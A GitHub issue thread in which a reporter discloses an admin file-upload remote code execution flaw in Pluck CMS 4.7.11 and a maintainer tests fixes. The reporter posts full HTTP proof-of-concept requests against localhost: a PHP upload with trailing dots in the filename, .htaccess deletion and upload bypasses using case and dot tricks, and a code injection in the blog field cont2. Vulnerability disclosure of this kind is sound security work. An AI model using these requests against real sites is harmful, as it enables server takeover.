Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files #91

Closed
wooyin opened this issue Dec 19, 2019 · 10 comments

Comments

@wooyin
Copy link

wooyin commented Dec 19, 2019

Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt
图片

step2: throw .htaccess.txt into trash
图片

step3: upload shell code
图片

POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--

图片

step4: view http://127.0.0.1/pluck4711/files/pass07.php
图片

@BSteelooper
Copy link
Contributor

Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.

@BSteelooper
Copy link
Contributor

Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?

@wooyin
Copy link
Author

wooyin commented Dec 19, 2019

can bypass like this

GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

@wooyin
Copy link
Author

wooyin commented Dec 19, 2019

And this way
图片

POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="submit"

Upload
-----------------------------293582696224464--

@BSteelooper
Copy link
Contributor

How does this last one work? the ..... is not omitted so it is not picked up by apache?
image

@BSteelooper
Copy link
Contributor

could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2

@wooyin
Copy link
Author

wooyin commented Dec 20, 2019

use strtolower()
图片

GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

@wooyin
Copy link
Author

wooyin commented Dec 20, 2019

And you should solve this too.

图片

cont2 is vulnable

POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit

@wooyin
Copy link
Author

wooyin commented Dec 20, 2019

I test on Windows, the system will delete points automatically
图片

@BSteelooper
Copy link
Contributor

Ok.. I’ll try to find a solution for the windows mishaps

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants